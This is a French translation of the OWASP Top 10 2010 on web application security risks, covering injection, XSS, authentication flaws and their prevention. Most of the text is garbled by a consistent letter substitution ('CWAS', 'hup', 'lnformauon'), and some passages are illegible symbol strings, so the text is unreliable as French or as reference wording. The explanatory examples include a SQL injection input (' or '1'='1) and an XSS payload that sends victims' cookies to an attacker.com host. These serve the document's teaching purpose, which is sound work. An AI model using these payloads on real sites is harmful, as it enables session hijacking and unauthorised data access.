A propos de l'CWAS

Copyr|ght et L|cense
CopyrlghL 2003 - 2010 1he CWAS loundauon
Ce documenL esL publle sous llcence Creauve Commons Aurlbuuon ShareAllke 3.0. our LouLe
reuullsauon ou dlsLrlbuuon, vous devez expllquer les condluons conLracLuelles de la llcence de ce Lravall.
Avant-propos
Les loglclels peu srs porLenL de[a auelnLe a nos
lnfrasLrucLures crluques LanL nancleres, que medlcales,
defense, energle ou auLre. noLre lnfrasLrucLure numerlque
devenanL de plus en plus complexe eL lnLerconnecLee, la
dlmculLe de parvenlr a une securlLe appllcauve augmenLe
exponenuellemenL. nous ne pouvons plus nous permeure de
Lolerer les problemes de securlLe pourLanL relauvemenL
slmples Lels ceux presenLes dans le 1op 10 de l'CWAS.
L'ob[ecuf du 1op 10 esL de promouvolr la senslblllsauon
relauve a la securlLe appllcauve en ldenuanL cerLalns des
rlsques les plus crluques renconLres par les enLreprlses. Le
1op 10 esL reference par de nombreuses normes, llvres,
ouuls, eL organlsmes, y comprls le Ml18L, Cl uSS, ulSA, l1C
eL beaucoup d'auLres. Ceue verslon du 1op 10 de l'CWAS
marque la 8e annee de ce pro[eL de senslblllsauon a propos
de l'lmporLance des rlsques securlLe appllcaufs. Le 1op 10 de
l'CWAS donL c'esL la verslon 2010, a lnlualemenL eLe publle
en 2003, des mlses a [our mlneures ayanL eLe falLes en 2004
eL 2007.
nous vous encourageons a uullser le 1op 10 an de
permeure a voLre enLreprlse d'lnluer une demarche relauve
a la securlLe appllcauve. Les developpeurs peuvenL
apprendre des erreurs d'auLres enLreprlses. Les dlrlgeanLs
devralenL commencer a reechlr sur la faon de gerer le
rlsque que les appllcauons loglclelles creenL dans leur
enLreprlse.
Mals le 1op 10 n'esL pas un programme de securlLe appllcauf.
L'CWAS recommande que les organlsmes eLabllssenL une
base sollde de formauon, de normes eL d'ouuls qul rend la
programmauon securlsee posslble. Sur ceue base, les
enLreprlses dolvenL lnLegrer la securlLe LanL dans leur
processus de developpemenL, que dans la verlcauon eL les
processus de malnLenance. La dlrecuon peuL uullser les
donnees generees par ces acuvlLes pour gerer les coLs eL les
rlsques assocles a la securlLe des appllcauons.
nous esperons le 1op 10 uule a vos eorLs de securlsauon
des appllcauons. n'heslLez pas a conLacLer l'CWAS pour
LouLes quesuons, commenLalres eL ldees, que ce solL
publlquemenL a CWAS-1op1en[llsLs.owasp.org ou en prlve
a dave.wlchers[owasp.org.
hup://www.owasp.org/lndex.php/1op_10
A propos de |'CWAS
L'Cpen Web Appllcauon SecurlLy ro[ecL (CWAS) esL une
communauLe ouverLe dedlee a alder les enLreprlses a
developper, acquerlr eL malnLenlr des appllcauons de
conance. A l'CWAS, vous Lrouverez (en acces llbre eL
graLulL)...
Cuuls eL normes de securlLe appllcaufs
Llvres enuers consacres aux LesLs de securlLe appllcaufs,
programmauon securlsee eL a l'audlL de code
ConLrles de securlLe sLandard eL blblloLheques
ChaplLres locaux dans le monde
8echerche de polnLe
Crandes conferences dans le monde enuer
Malllng llsLs
LL beaucoup plus. sur www.owasp.org
1ous les ouuls, documenLs, forums, eL ChaplLres de l'CWAS
sonL graLulLs eL ouverLs a LouLe personne lnLeressee par la
securlLe des appllcauons. nous preconlsons l'approche de la
securlLe des appllcauons en LanL que probleme global lncluanL
LanL l'lndlvldu, les processus que la Lechnologle, les approches
les plus emcaces pour la securlLe des appllcauons necesslLanL
des amellorauons dans Lous ces domalnes.
L'CWAS esL une enLreprlse d'un nouveau Lype. noLre LoLale
llberLe eL lndependance de presslons commerclales nous
permeL de fournlr des lnformauons lmparuales, prauques eL
renLables au su[eL de la securlLe des appllcauons. L'CWAS
n'esL amlle a aucune enLreprlse de Lechnologle, blen que nous
souLenlons l'uullsauon eclalree de Lechnologles commerclales
de securlLe. 1ouL comme de nombreux pro[eLs de loglclels
open-source, l'CWAS produlL de nombreux Lypes de supporLs
dans un esprlL collaborauf eL ouverL.
La londauon CWAS esL une enuLe a buL non lucrauf qul
s'assure de la reusslLe a long Lerme du pro[eL. rauquemenL
LouLe personne assoclee a l'CWAS esL benevole, y comprls le
Consell de l'CWAS, les ComlLes mondlaux, les Leaders de
ChaplLres, les chefs de pro[eL, eL les membres du pro[eL. nous
souLenons la recherche lnnovanLe en securlLe grce a des
subvenuons eL des lnfrasLrucLures.
8e[olgnez-nous!
C
8|envenue
Ceue mlse a [our lmporLanLe presenLe une llsLe plus conclse orlenLee 8lsque des D|x k|sques de Scur|t App||canfs Web |es |us
Cr|nques. Le 1op 10 de l'CWAS a Lou[ours eLe orlenLe rlsque, mals ceue mlse a [our rend cecl beaucoup plus clalr par rapporL
aux edluons precedenLes. ll fournlL egalemenL des lnformauons supplemenLalres sur la faon d'evaluer ces rlsques pour vos
appllcauons.
our chaque lLem du 1op 10, ceue verslon presenLe la probablllLe globale alnsl que les facLeurs de consequence uullses pour
classer la gravlLe speclque du rlsque. ll presenLe ensulLe des lndlcauons sur la faon de verler sl vous avez des problemes dans
le domalne, commenL les evlLer, quelques exemples de fallles, alnsl que des polnLeurs pour plus d'lnformauons.
L'ob[ecuf prlnclpal du 1op 10 de l'CWAS esL d'eduquer les developpeurs, concepLeurs, archlLecLes, managers, eL les enLreprlses
au su[eL des consequences des falblesses les plus lmporLanLes lnherenLes a la securlLe des appllcauons web. Le 1op 10 fournlL des
Lechnlques de base pour se proLeger conLre ces domalnes problemauques a hauL rlsque - eL fournlL egalemenL des consells sur la
dlrecuon a sulvre.
Avernssements
Ne vous arrtez pas 10. ll y a des cenLalnes de problemes
qul pourralenL lnuer sur la securlLe globale d'une appllcauon
web comme lndlque dans le Culde du developpeur de
l'CWAS. C'esL une lecLure essenuelle pour qulconque
developpe des appllcauons web au[ourd'hul. ues consells sur
la manlere de Lrouver des vulnerablllLes dans les appllcauons
web sonL fournls dans le Culde de 1esL eL le Culde d'audlL de
Code, Lous deux conslderablemenL mls a [our depuls la
verslon precedenLe du 1op 10 de l'CWAS.
Changement constant. Ce 1op 10 evoluera dans le Lemps.
Mme sans modler une seule llgne de code de voLre
appllcauon, vous pouvez Lre de[a vulnerable a quelque
chose donL personne n'a [amals pense auparavanL. veulllez
prendre connalssance des consells a la n du 1op 10 !"#$ &'$
$'()*#$ +'&"),'$ "-. !/,'&*00'-+$1 ,/+23("4'-+$ '4
*+5"#2$6'$ pour plus d'lnformauons.
ensez pos|nf. Cuand vous serez prL a arrLer de chasser les
vulnerablllLes eL a vous concenLrer sur l'eLabllssemenL de
solldes conLrles de securlLe des appllcauons, l'CWAS vlenL
d'elaborer le SLandard de verlcauon de SecurlLe Appllcauve
(SvS) comme gulde pour les enLreprlses eL les audlLeurs
d'appllcauon sur ce qu'll fauL verler.
Un||sez |es oun|s sagement. Les fallles de securlLe peuvenL
Lre complexes eL enfoules sous des monLagnes de code.
uans la pluparL des cas, l'approche la plus renLable pour
Lrouver eL ellmlner ces falblesses resLe l'humaln arme de
bons ouuls.
A||ez p|us |o|n. La securlsauon d'appllcauons web esL posslble
seulemenL quand un cycle de vle de developpemenL securlse
de l ogl cl el esL empl oye. our des consel l s sur
l'lmplemenLauon d'un SuLC securlse, nous avons recemmenL
publle le Cpen Soware Assurance MaLurlLy Model (SAMM),
qul esL une mlse a [our lmporLanLe du ro[eL CLAS.
kemerc|ements
nos remerclemenLs a AspecL SecurlLy pour avolr lnlue, plloLe,
eL mls a [our le 1op 10 de l'CWAS depuls sa creauon en 2003,
eL a ses prlnclpaux auLeurs: !e Wllllams eL uave Wlchers.
nous voudrlons remercler les enLreprlses qul onL conLrlbue a
supporLer la mlse a [our 2010 en fournlssanL leur donnees sur
la frequence de vulnerablllLe:
! AspecL SecurlLy
! Ml18L - CvL
! SoLek
! WhlLePaL SecurlLy lnc. - SLausucs
nous voudrlons aussl remercler ceux ayanL conLrlbue par leur
conLenu slgnlcauf ou la relecLure de ceL updaLe du 1op 10:
! Mlke 8oberskl (8ooz Allen PamllLon)
! !uan Carlos Calderon (SoLek)
! Mlchael CoaLes (AspecL SecurlLy)
! !eremlah Crossman (WhlLePaL SecurlLy lnc.)
! !lm Manlco (for all Lhe 1op 10 podcasLs)
! aul eLesh (Soluuonary lnc.)
! Lrlc Sherldan (AspecL SecurlLy)
! nell SmlLhllne (CneSLopAppSecurlLy.com)
! Andrew van der SLock
! Colln WaLson (WaLson Pall, LLd.)
! CWAS uenmark ChapLer (Led by ulf Munkedal)
! CWAS Sweden ChapLer (Led by !ohn Wllander)
lnLroducuon
I
ue|s sont |es changements de 2007 2010?
Le paysage des menaces sur les appllcauons lnLerneL esL en perpeLuel changemenL. Les facLeurs clefs dans ceue evoluuon sonL
les progres eecLues par les auaquanLs, l'essor de nouvelles Lechnologles, LouL comme le deplolemenL de sysLemes de plus en
plus complexes. our sulvre les evoluuons, L'CWAS 1op10 esL consLammenL mls a [our. uans ceue verslon 2010, nous avons
eecLue Lrols changemenLs slgnlcaufs :
1) our clarler les choses, le 1op10 devlenL le 1op10 des rlsques, eL non pas le 1op10 des vulnerablllLes les plus communes. volre
les deLalls concernanL les 8lsques de SecurlLe des Appllcauons en page sulvanLe.
2) nous avons change la meLhodologle de classemenL pour esumer le rlsque, pluLL que de se baser seulemenL sur la frequence
de la vulnerablllLe assoclee. Cela aecLe le classemenL du 1op10, comme vous pouvez le volr dans le Lableau cl-dessous.
3) nous avons remplace deux elemenLs de la llsLe precedenLe par deux nouveaux rlsques :
+ A!Cu1: A6 - Mauva|se conhguranon scur|t. CeL elemenL eLalL presenL dans le 1op10 2004 en posluon A10 :Gesnon de
conhguranon non scur|se , mals avalL eLe reure en 2007, car ll n'eLalL pas consldere comme un probleme loglclel.
neanmolns, d'un polnL de vue rlsque au seln d'une organlsauon eL du nombre de cas, ll merlLe clalremenL son reLour
dans le 1op10, ll esL donc de nouveau presenL.
+ A!Cu1: A10 - ked|recnons et kenvo|s non va||ds. Ce probleme apparaiL dans ce 1op10. reuve qu'll esL relauvemenL mal
connu mals Lres repandu eL qu'll peuL avolr des consequences lmporLanLes..
- 8L1l8L: A3 - Lxcunon de hch|er ma||c|eux. C'esL un probleme Lou[ours lmporLanL dans beaucoup d'envlronnemenLs. Mals
le nombre de cas lmporLanL en 2007, eLalL du a un nombre lmporLanL d'appllcauons P vulnerables. P esL
malnLenanL fournl avec une congurauon par defauL plus securlsee redulsanL dlrecLemenL ce cas.
- 8L1l8L: A6 Iu|te d'|nformanons et tra|tement d'erreur |ncorrect. C'esL un probleme Lres repandu, mals l'lmpacL de
l'amchage des Lraces d'appels des foncuons eL des messages d'erreurs esL souvenL mlnlmal. Avec l'a[ouL de Mauva|se
conhguranon scur|t ceue annee, la gesuon des erreurs vla une congurauon correcLe esL une parue lmporLanLe de la
congurauon securlLe de vos appllcauons eL serveurs.
CWAS 1op 10 - 2007 (rcdent) CWAS 1op 10 - 2010 (Nouveau)
A2 - Ia|||es d'|n[ecnon A1 - In[ecnon
A1 - Cross S|te Scr|pnng (kSS) A2 - Cross-S|te Scr|pnng (kSS)
A3 - V|o|anon de Gesnon d'authennhcanon et de Sess|on A3 - V|o|anon de Gesnon d'authennhcanon et de Sess|on
A4 - kfrences d|rectes non scur|ses un ob[et A4 - kfrences d|rectes non scur|ses un ob[et
AS - Ia|s|hcanon de requte |nters|te (CSkI) AS - Ia|s|hcanon de requte |nters|te (CSkI)
<anc|ennement 110 2004 A10 Gesnon de conhguranon non
scur|se
A6 - Mauva|se conhguranon scur|t (NCUVLAU)
A8 - Stockage cryptograph|que non scur|s A7 - Stockage cryptograph|que non scur|s
A10 - Manque de restr|cnon d'accs une UkL A8 - Manque de restr|cnon d'accs une UkL
A9 -Commun|canons non scur|ses A9 - rotecnon |nsumsante de |a couche transport
<non prsent dans |e 110 2007> A10 - ked|recnon et kenvo|s non va||ds (NCUVLAU)
A3 - Lxcunon de hch|er ma||c|eux <renr du 110 2010>
A6 - Iu|te d'|nformanons et tra|tement d'erreur |ncorrect <renr du 110 2010>
Notes concernant ceue vers|on kN
u'est-ce qu'un r|sque de scur|t app||canf?
Les auaquanLs peuvenL poLenuellemenL uullser beaucoup de chemlnemenLs dlerenLs a Lravers voLre appllcauon pour porLer
auelnLe a voLre meuer ou a voLre enLreprlse. Chacun de ces chemlns represenLe un rlsque plus ou molns serleux pouvanL merlLer
voLre auenuon.
arfols ce chemln esL exLrmemenL slmple a decouvrlr eL a explolLer, parfols exLrmemenL dlmclle. ue la mme manlere le
pre[udlce peuL Lre Lres falble LouL comme meure en perll voLre enLreprlse. our deLermlner le rlsque pour voLre enLreprlse, vous
pouvez evaluer la probablllLe assoclee llee a chaque menace, vecLeur d'auaque eL falblesse de securlLe, eL la comblner avec une
evaluauon de l'lmpacL Lechnlque eL meuer a voLre enLreprlse. L'ensemble de ces facLeurs deLermlne le rlsque global.
Ia|b|esse
Auaque
Menaces
Impact
ue| est mon r|sque?
Ceue mlse a [our du CWAS 1op 10 se focallse sur l'ldenucauon des rlsques les
plus serleux pour un large evenLall d'enLreprlses. our chacun de ces rlsques, nous
fournlssons une lnformauon generlque a propos de la vralsemblance eL de l'lmpacL
Lechnlque en uullsanL le schema de classlcauon slmple sulvanL, qul esL base sur la
meLhodologle de classemenL du rlsque de l'CWAS.
1ouLefols, ll n'y a que vous qul connalssez les speclclLes de voLre envlronnemenL eL
de voLre meuer. our une appllcauon donnee, ll peuL ne pas y avolr d'agenL de
menace permeuanL d'eecLuer l'auaque ou l'lmpacL Lechnlque peuL ne pas avolr
de consequence. ar consequenL ll esL necessalre que vous evalulez vous mme le
rlsque en vous focallsanL sur les agenLs de menaces, conLrles de securlLe eL
lmpacLs meuers de voLre enLreprlse.
8len que les precedenLes verslons de l'CWAS 1op10 meuenL l'accenL sur les
vulnerablllLes les plus communes, elles onL egalemenL eLe conues dans une
opuque 8lsque. L'lnuLule de chacun des rlsques du 1op10 decoule de la Lypologle
de l'auaque, la falblesse explolLee ou du Lype d'lmpacL cause. nous avons reLenu
les lnuLules les plus frequemmenL uullses dans le buL de senslblllser au mleux.
kfrences
CWAS
MeLhodologle de classemenL du
rlsque de l'CWAS
Arucle sur la modellsauon des
Menaces eL du rlsque
Lxternes
lAl8 lnformauon 8lsk lramework
La modellsauon des menaces
Mlcroso (S18luL eL u8LAu)
Ia|b|esse
Auaque
Vecteurs
d'auaques
Vu|nrab|||t Impacts
1echn|ques
Impacts
Mners
Auaque
Impact
Impact
Acnf
Ioncnon
Acnf
Ia|b|esse
Contr|e
Contr|e
Contr|e Ia|b|esse
Contr|es de
Scur|t
Agent de
Menace
Vecteur
d'auaque
Vra|semb|ance
de |a
vu|nrab|||t
Dtecnon
de |a
vu|nrab|||t
Impact
1echn|que
Impact
Mner
?
Slmple 1res repandue Slmple Severe
?
Moyen Commune Moyen Modere
ulmclle 8are ulmclle Mlneur
k|sques app||canfs scur|t
k|squ
e
- une fallle d'ln[ecuon, Lelle l'ln[ecuon SCL, CS eL LuA, se produlL quand une donnee non able
esL envoyee a un lnLerpreLeur en LanL qu'elemenL d'une commande ou d'une requLe. Les
donnees hosules de l'auaquanL peuvenL duper l'lnLerpreLeur an de l'amener a execuLer des
commandes forLulLes ou acceder a des donnees non auLorlsees.
A1 - In[ecnon
- Les fallles SS se produlsenL chaque fols qu'une appllcauon prend des donnees non ables eL les
envole a un browser web sans valldauon approprlee. SS permeL a des auaquanLs d'execuLer du
scrlpL dans le navlgaLeur de la vlcume an de deLourner des sesslons uullsaLeur, degurer des
slLes web, ou redlrlger l'uullsaLeur vers des slLes malvelllanLs.
A2 - Cross-S|te
Scr|pnng (kSS)
- Les foncuons appllcauves relauves a l'auLhenucauon eL la gesuon de sesslon ne sonL souvenL
pas mlses en uvre correcLemenL, permeuanL aux auaquanLs de compromeure les moLs de
passe, cles, [eLons de sesslon, ou d'explolLer d'auLres fallles d'lmplemenLauon pour s'approprler
les ldenuLes d'auLres uullsaLeurs..
A3 - V|o|anon de
Gesnon
d'Authennhcanon
et de Sess|on
- une reference dlrecLe a un ob[eL se produlL quand un developpeur expose une reference a un
ob[eL d'execuuon lnLerne, Lel un chler, un dossler, un enreglsLremenL de base de donnees, ou
une cle de base de donnees. Sans un conLrle d'acces ou auLre proLecuon, les auaquanLs peuvenL
manlpuler ces references pour acceder a des donnees non auLorlsees..
A4 - kfrences
d|rectes non
scur|ses un
Cb[et
- une auaque CS8l (Cross SlLe 8equesL lorgery) force le navlgaLeur d'une vlcume auLhenuee a
envoyer une requLe P11 forgee, comprenanL le cookle de sesslon de la vlcume alnsl que LouLe
auLre lnformauon auLomauquemenL lnclue, a une appllcauon web vulnerable. Cecl permeL a
l'auaquanL de forcer le navlgaLeur de la vlcume a generer des requLes donL l'appllcauon
vulnerable pense qu'elles emanenL leglumemenL de la vlcume
AS - Ia|s|hcanon de
requte |nters|te
(CSkI)
- une bonne securlLe exlge d'avolr une congurauon securlsee denle eL deployee pour
l'appllcauon, les conLexLes, serveur d'appllcauon, serveur web, serveur de base de donnees, eL la
plaLe-forme. 1ous ces parameLres dolvenL Lre denls, mls en uvre, eL malnLenu an de ne pas
comprendre de fallles de securlLe. Cecl lncluL de malnLenlr Lous les loglclels a [our, y comprls
LouLes les blblloLheques de code employees par l'appllcauon.
A6 - Mauva|se
conhguranon
Scur|t
- 8eaucoup d'appllcauons web ne proLegenL pas correcLemenL les donnees senslbles, Lelles que les
carLes de credlL, SSns, les lnformauons d'auLhenucauon, avec un chlremenL ou un hash
approprle. Les plraLes peuvenL voler ou de modler ces donnees falblemenL proLegees pour
perpeLrer un vol d'ldenuLe eL d'auLres crlmes, Lels que la fraude a la carLe de credlL.
A7 - Stockage
Cryptograph|que
non Scur|s
- 8eaucoup d'appllcauons web verlenL les drolLs d'acces u8L avanL de rendre les llens proLeges.
CependanL, les appllcauons dolvenL eecLuer des conLrles d'acces slmllalres chaque fols que ces
pages sonL accedees, ou les auaquanLs seronL en mesure de forger des u8L pour acceder a ces
pages cachees de LouLe faon.
A8 - Manque de
kestr|cnon d'Accs
UkL
- Les appllcauons onL souvenL du mal a auLhenuer, chlrer eL proLeger la condenuallLe eL
l'lnLegrlLe d'un Lrac reseau senslble. Cuand elles le fonL, elles supporLenL parfols des algorlLhmes
falbles, uullsenL des cerucaLs explres ou lnvalldes, ou ne les emplole pas correcLemenL.
A9 - rotecnon
|nsumsante de |a
couche 1ransport
- Les appllcauons web reorlenLenL eL fonL sulvre frequemmenL les uullsaLeurs vers d'auLres pages
eL slLes web, eL uullsenL des donnees non ables pour deLermlner les pages de desunauon. Sans
valldauon approprlee, les auaquanLs peuvenL redlrlger les vlcumes vers des slLes de phlshlng ou
de loglclel malvelllanL, ou uullser les renvols pour acceder a des pages non auLorlsees.
A10 - ked|recnons
et kenvo|s non
va||ds
CWAS 1op 10 - 2010
k|sques App||canfs Scur|t
110
__________
Lxp|o|tanon
SIMLL
rva|ence
CCMMUNL
Dtecnon
MCLNNL
Impact
SLVLkL
__________
Conslderer LouLe
personne en
mesure de
soumeure des
donnees non ables
au sysLeme, y
comprls les
uullsaLeurs
exLernes, lnLernes,
eL les
admlnlsLraLeurs.
L'auaquanL envole
un slmple LexLe
explolLanL la synLaxe
de l'lnLerpreLeur
clble. resque LouLe
source de donnee
peuL Lre un
vecLeur d'ln[ecuon,
y comprls les
sources lnLernes.
Les fallles d'ln[ecuon onL lleu lorsqu'une
appllcauon envole des donnees non
conLrlees a un lnLerpreLeur. Les fallles
d'ln[ecuon sonL exLrmemenL repandues,
paruculleremenL dans les codes exlsLanLs,
Lres souvenL dans les requLes SCL, LuA,
aLh, les commandes sysLemes, les
argumenLs de programme, eLc. Les fallles
d'ln[ecuons sonL slmple a decouvrlr en
examlnanL le code, mals plus dlmclle vla
des LesLs. Les scanners eL fuzzers peuvenL
alder un auaquanL a les decouvrlr.
une ln[ecuon peuL
mener a de la perLe
ou corrupuon de
donnees, perLe de
LraablllLe ou du
denl d'acces. Llle
peuL mener parfols
[usqu'a la prlse de
conLrle LoLal du
serveur.
Conslderer la valeur
meuer de la
donnees aecLee eL
de la plaLeforme
execuLanL
l'lnLerpreLeur. 1ouLe
donnee peuL-Lre
volee, modlee ou
eacee. voLre
lmage de marque
peuL-elle Lre
enLachee
Lxemp|e de scnar|o d'auaque
L'appllcauon uullse des donnees non conLrlees dans la
consLrucuon de la requLe SCL vulnerable sulvanLe :
Str|ng query = "SLLLC1 * IkCM accounts WnLkL
custID='" + request.getarameter("|d") +"'",
L'auaquanL modle le parameLre ld' dans son navlgaLeur
pour envoyer: ' or '1''1. Cela change le resulLaL de la
requLe qul renvole alors LouLes les donnees de compLe de
la base, au lleu de l'unlque du cllenL.
hup:]]examp|e.com]app]accountV|ew?|d=' or '1'='1
uans le plre des cas, l'auaquanL uullse ceue vulnerablllLe
pour lnvoque des procedures sLockees speclales de la base
de donnees qul lul permeuenL de prendre le conLrle LoLal
du serveur hebergeanL la base.
Su|s-[e vu|nrab|e?
La mellleure faon de verler qu'une appllcauon esL
vulnerable a de l'ln[ecuon esL de verler que les
lnLerpreLeurs separenL blen les donnees non conLrlees de
la requLe ou de la commande execuLee. our SCL, ll s'aglL
d'uullser les mecanlsmes de requLes preparees vla des
varlables de llalson dans LouLes les requLes ou procedures
sLockees eL d'evlLer les requLes dynamlques.
verler le code esL une manlere raplde eL preclse de volr sl
l'appllcauon uullse des lnLerpreLeurs de manlere securlsee.
Les ouuls d'analyse de code peuvenL alder un analysLe
securlLe a decouvrlr l' uullsauon des lnLerpreLeurs eL Lracer
le ux de donnees a Lravers l'appllcauon. Les LesLeurs
peuvenL vallder ces fallles en creanL des codes
d'explolLauon qul conrme la vulnerablllLe.
Les Scanners auLomauses peuvenL donner un aperu
d'ln[ecuons connues. Les scanners ne peuvenL pas Lou[ours
decouvrlr les lnLerpreLeurs eL onL des dlmculLes a deLecLer
une auaque reussle. une mauvalse gesuon des erreurs
permeL de decouvrlr plus facllemenL les fallles d'ln[ecuon.
kfrences
CWAS
CWAS SCL ln[ecuon revenuon CheaL SheeL
CWAS ln[ecuon llaws Arucle
LSAl Lncoder Al
LSAl lnpuL valldauon Al
ASvS: CuLpuL Lncodlng/Lscaplng 8equlremenLs (v6)
CWAS 1esung Culde: ChapLer on SCL ln[ecuon 1esung
CWAS Code 8evlew Culde: ChapLer on SCL ln[ecuon
CWAS Code 8evlew Culde: Command ln[ecuon
Lxternes
CWL LnLry 77 on Command ln[ecuon
CWL LnLry 8 on SCL ln[ecuon
Comment empcher ceue auaque?
revenlr une ln[ecuon necesslLe de separer les donnees non
conLrlees des requLes ou des commandes.
1. La mellleure opuon conslsLe a uullser une Al securlsee qul
permeL de se passer de l'lnLerpreLeur ou qul fournlL une
lnLerface de parameLrage des requLes. Meez vous des Al,
comme les procedures sLockees, qul sonL parameLrees mals qul
peuvenL lnLrodulre des ln[ecuons en profondeur.
2. Sl vous ne dlsposez pas d'une Al de parameLrage des
requLes, vous devez falre exLrmemenL auenuon a echapper
les caracLeres speclaux en uullsanL la synLaxe parucullere de
l'lnLerpreLeur. L'LSAl de l'CWAS dlspose de cerLalnes rouunes
d'echappemenL.
3. La valldauon des enLrees par des llsLes blanches ou
posluves avec une canonlsauon correcLe esL recommandee,
mals n'esL pas le seul moyen de defense car cerLalnes
appllcauons necesslLenL des caracLeres speclaux en enLree. L'
CWAS's LSAl dlspose d'une llbralrle exLenslble de rouunes de
valldauon de Lype llsLe blanche
A1 In[ecnon
Vu|nrab|||t
de scur|t
Vecteurs
d'auaque
Impacts
techn|que
Agents de Menace
Impacts
d'aa|re
__________
Lxp|o|tanon
MCLNNL
rva|ence
1kLS kLANDU
Dtecnon
IACILL
Impact
MCDLkL
__________
Conslderer LouLe
personne en
mesure de
soumeure des
donnees au
sysLeme. Cecl lncluL
les uullsaLeurs
exLernes, lnLernes,
eL les
admlnlsLraLeurs.
L'auaquanL soumeL
un conLenu acuf a
l 'appl l cauon, qul
sera reLourne au
navl gaLeur de l a
v l c u m e . 1o u L e
source de donnees
e x L e r n e s p e u L
devenlr un vecLeur
d'auaque, Lelle que
la base de donnees.
SS esL la falblesse de securlLe la plus
repandue dans les appllcauons web. Les
fallles SS onL lleu lorsque l'appllcauon
genere des pages conLenanL des donnees
soumlses par le cllenL sans les avolr
valldees ou echappees au prealable. 1rols
Lypes ma[eurs de SS sonL recenses: 1)
sLored, 2) +'7'(4'! 3) 89: ;"$'!. Les
fallles SS sonL facllemenL deLecLables au
moyen des LesLs de securlLe ou l'analyse
du code source.
L'auaquanL peuL
execuLer un scrlpL
dans le navlgaLeur
de la vlcume an de
redlrlger le cllenL,
voler les ldenuanLs
de sesslon, lnsLaller
u n p r o g r a mme
degurer le slLe, eLc.
Conslderer
l'lmporLance du
sysLeme aecLe
pour l'acuvlLe, alnsl
que les donnees
LralLees par ce
dernler. Conslderer
egalemenL l'lmpacL
d'une dlvulgauon de
la vulnerablllLe.
Lxemp|e de scnar|os d'auaque
uans l'exemple cl-apres, l'appllcauon reuullse des donnees
soumlses dans la requLe par l'uullsaLeur pour elaborer du
conLenu P1ML, sans les vallder ou les echapper au prealable:
(Str|ng) page += "<|nput name='cred|tcard' type='1Lk1'
va|ue='" + request.getarameter("CC") + "'>",
L'auaquanL peuL alors consLrulre une requLe aurlbuanL au
champ 'CC' la valeur sulvanLe:
hup://example.com/CC'><scr|pt>document.|ocanon=
'hup:]]www.auacker.com]cg|-b|n]cook|e.cg|?
foo='+document.cook|e<]scr|pt>'.
L'execuuon de ceue requLe dans le navlgaLeur de la vlcume
declenchera l'envol de l'ldenuanL de sesslon (sesslon lu) sur
le serveur de l'auaquanL, lul permeuanL alnsl d'operer un vol
de la sesslon en cours. ll esL a preclser que la presence d'une
fallle SS rend generalemenL lnoperanLes les defenses conLre
les auaques CS8l (volr che A pour plus d'lnformauons).
Su|s-[e vu|nrab|e?
vous devez vous assurer que LouLe donnee soumlse par un
uullsaLeur esL correcLemenL valldee eL echappee (*-40-4
'#(*!2#5) avanL d'Lre lncluse dans la page reLournee aux
cllenL. un encodage able garanura que le conLenu reLourne
au navlgaLeur sera LralLe comme du LexLe, eL non du conLenu
acuf pouvanL Lre execuLe.
Les ouuls d'analyse sLauque eL dynamlque peuvenL ldenuer
les SS de faon auLomausee. 1ouLefols, chaque appllcauon
consLrulL les pages dleremmenL eL falL parfols appel a des
lnLerpreLeurs dlvers Lels que !avaScrlpL, Acuve, llash,
SllverllghL, eLc., rendanL la deLecuon auLomauque plus
complexe. La verlcauon compleLe requlerL la comblnalson
d'une approche manuelle (revue de code/LesL d'lnLruslon)
avec une approche auLomausee.
Les Lechnologles Web 2.0, Lelles que A!A, rendenL plus
complexe la deLecuon de vulnerablllLe SS.
kfrences
CWAS
CWAS SS revenuon CheaL SheeL
CWAS Cross-SlLe Scrlpung Arucle
LSAl ro[ecL Pome age
LSAl Lncoder Al
ASvS: CuLpuL Lncodlng/Lscaplng 8equlremenLs (v6)
ASvS: lnpuL valldauon 8equlremenLs (v)
1esung Culde: 1sL 3 ChapLers on uaLa valldauon 1esung
CWAS Code 8evlew Culde: ChapLer on SS 8evlew
Autres rfrences
CWL LnLry 7 on Cross-SlLe Scrlpung
8Snake's SS Auack CheaL SheeL
Comment empcher ceue auaque?
La prevenuon conLre les SS conslsLe a s'assurer qu'aucune
donnee uullsaLeur ne pulsse Lre LralLee par le navlgaLeur
comme du conLenu execuLable.
1. Lchapper LouLe donnee non able reLournee au navlgaLeur,
selon son conLexLe nal: corps de la page, aurlbuL P1ML,
scrlpL !avaScrlpL, declarauon de sLyle CSS, llen/u8L, eLc. Les
developpeurs prennenL en charge l'echappemenL lorsque le
lramework ne le falL pas auLomauquemenL. ConsulLer CWAS
SS revenuon CheaL SheeL pour plus d'lnformauons
Lechnlques.
2. La valldauon posluve ou blanche, la mlse en forme
canonlque eL la converslon vers l'encodage approprle
consuLuenL des defenses emcaces mals pas lnfallllbles conLre
les SS en ralson des nombreuses manleres donL les
appllcauons LralLenL leurs conLenus. Seule une valldauon
LoLale de la donnee (mlse en forme canonlque, Lype,
longueur, regles meuer, eLc.) esL emcace.
Cross-S|te Scr|pnng (kSS) A2
Vu|nrab|||t
de scur|t
Vecteurs
d'auaque
Impacts
techn|que
Agents de Menace
Impacts
d'aa|re
__________
Lxp|o|tanon
MCLNNL
rva|ence
kLANDU
Dtecnon
MCLNNL
Impact
SLVLkL
__________
Conslderer les acces
anonymes alnsl que
les uullsaLeurs
LenLer d'acceder a
d'auLres compLes.
Conslderer
egalemenL les
collaboraLeurs
souhalLanL operer
sous une auLre
ldenuLe.
L'auaquanL explolLe
des fulLes ou
falblesses des
gesuonnalres de
sesslons eL
d'auLhenucauon
(ex: compLes
exposes, moLs de
passes, [eLons de
sesslon) pour
usurper l'ldenuLe.
Les developpeurs peuvenL Lre LenLes de
creer leur propre gesuonnalre de sesslons
eL d'auLhenucauon, mals ll s'aglL d'une
Lche complexe. ll en resulLe souvenL des
lmplemenLauons conLenanL des falblesses
de securlLe dans des foncuons Lelles que:
la deconnexlon, les foncuons llees au
sLockage eL a la recuperauon des moLs de
passes, la gesuon des prols, eLc. La a
dlverslLe des lmplemenLauons rend la
recherche de vulnerablllLes complexe.
Ln explolLanL ces
falblesses, un
auaquanL accede au
sysLeme sous une
auLre ldenuLe eL en
obuenL les
prlvlleges. Les
compLes prlvllegles
sonL vlses en
prlorlLe.
Conslderer la valeur
marchande ou
condenuelle des
donnees ou des
foncuons exposees.
Conslderer
egalemenL l'lmpacL
d'une dlvulgauon de
la vulnerablllLe.
Lxemp|e de scnar|os d'auaque
Scenarlo 1: Le sysLeme de reservauon d'une compagnle
aerlenne reecrlL les u8Ls en y plaanL le [eLon de sesslon:
hup:]]examp|e.com]sa|e]sa|e|tems,[sess|on|d=
20CC2IDkM0CSNDLSknCIUN2IV?dest=nawa||
